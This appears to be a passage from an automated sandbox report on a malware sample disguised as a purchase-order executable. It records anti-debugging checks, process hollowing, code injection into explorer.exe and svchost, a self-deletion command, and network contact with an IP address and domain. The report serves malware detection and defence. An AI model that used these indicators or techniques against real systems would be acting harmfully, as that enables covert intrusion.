          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01624F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01624F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01638794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01637E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01637E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01637E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01637E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01637E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01637E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016DFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01658E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01668EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016DFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016BFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03753B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03753B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0372DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0372F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0372DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037D23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03754BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03754BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03754BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03752397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0375B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03731B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03731B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0376927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03729240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03729240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03729240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03729240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03764A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03764A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03725210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03725210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03725210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03725210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0372AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0372AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03743A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03738A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03752AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03752ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0373AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0373AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0375FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\PO_101&102.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 185.178.208.163 80
          Source: C:\Windows\explorer.exeDomain query: www.reynbetgirisi.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO_101&102.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 100000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO_101&102.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO_101&102.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO_101&102.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\PO_101&102.exeMemory written: C:\Users\user\Desktop\PO_101&102.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO_101&102.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO_101&102.exeThread register set: target process: 3352
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3352
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess created: C:\Users\user\Desktop\PO_101&102.exe {path}
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess created: C:\Users\user\Desktop\PO_101&102.exe {path}
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_101&102.exe'
          Source: explorer.exe, 0000000B.00000000.329498700.00000000011E0000.00000002.00020000.sdmp, svchost.exe, 0000000F.00000002.561850229.0000000004590000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000B.00000000.329180655.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 0000000B.00000000.349357050.0000000005E10000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.561850229.0000000004590000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.329498700.00000000011E0000.00000002.00020000.sdmp, svchost.exe, 0000000F.00000002.561850229.0000000004590000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.329498700.00000000011E0000.00000002.00020000.sdmp, svchost.exe, 0000000F.00000002.561850229.0000000004590000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.353798297.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
